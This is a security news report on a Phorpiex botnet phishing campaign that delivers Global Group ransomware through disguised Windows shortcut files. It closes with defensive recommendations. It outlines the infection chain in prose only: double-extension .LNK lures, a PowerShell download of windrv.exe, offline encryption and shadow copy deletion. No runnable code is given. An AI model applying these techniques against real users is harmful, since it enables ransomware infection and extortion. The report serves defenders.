A new phishing campaign leveraging the infamous Phorpiex botnet has been observed distributing Global Group ransomware through weaponized Windows shortcut (.LNK) files, according to a new advisory from Forcepoint X-Labs.
The Attack Chain
The campaign uses phishing emails with the subject line “Your Document” — a lure that has remained effective throughout 2024 and 2025. Attackers disguise malicious shortcut files using double extensions like Document.doc.lnk, exploiting Windows' default behavior of hiding known file extensions.
Once opened, the infection chain unfolds rapidly:
- The shortcut launches cmd.exe
- PowerShell downloads a remote payload, saving it as windrv.exe
- The binary executes silently without visible user prompts
Phorpiex: A 15-Year-Old Threat Still Thriving
Phorpiex is a modular malware-as-a-service (MaaS) botnet that has been active since approximately 2010. Despite its age, the botnet remains highly effective as a distribution platform for ransomware and other secondary malware.
Global Group Ransomware: Designed for Stealth
What makes Global Group ransomware particularly dangerous is its offline operation model. Unlike modern ransomware families that rely on command-and-control (C2) communication, Global Group:
- Generates encryption keys locally — no C2 server contact required
- Performs no data exfiltration — reducing network traffic that might trigger alerts
- Functions in air-gapped environments — a significant threat to isolated systems
The ransomware uses the ChaCha20-Poly1305 encryption algorithm and appends the .Reco extension to encrypted files. A ransom note titled README.Reco.txt is dropped across the system, and the desktop wallpaper is replaced with a GLOBAL GROUP message.
Adding to forensic challenges, the malware deletes itself after execution and removes shadow copies, severely complicating recovery efforts.
Why This Matters
“This campaign demonstrates how long-standing malware families like Phorpiex remain highly effective when paired with simple but reliable phishing techniques,” Forcepoint noted. “By exploiting familiar file types such as Windows shortcut files, attackers can gain initial access with minimal friction.”
Recommendations
- Block .LNK attachments at the email gateway
- Enable file extension display in Windows to expose double-extension tricks
- Monitor for suspicious PowerShell execution following shortcut file access
- Maintain offline backups — critical given Global Group's shadow copy deletion
- Train users to recognize phishing emails with generic document lures
Source: Infosecurity Magazine
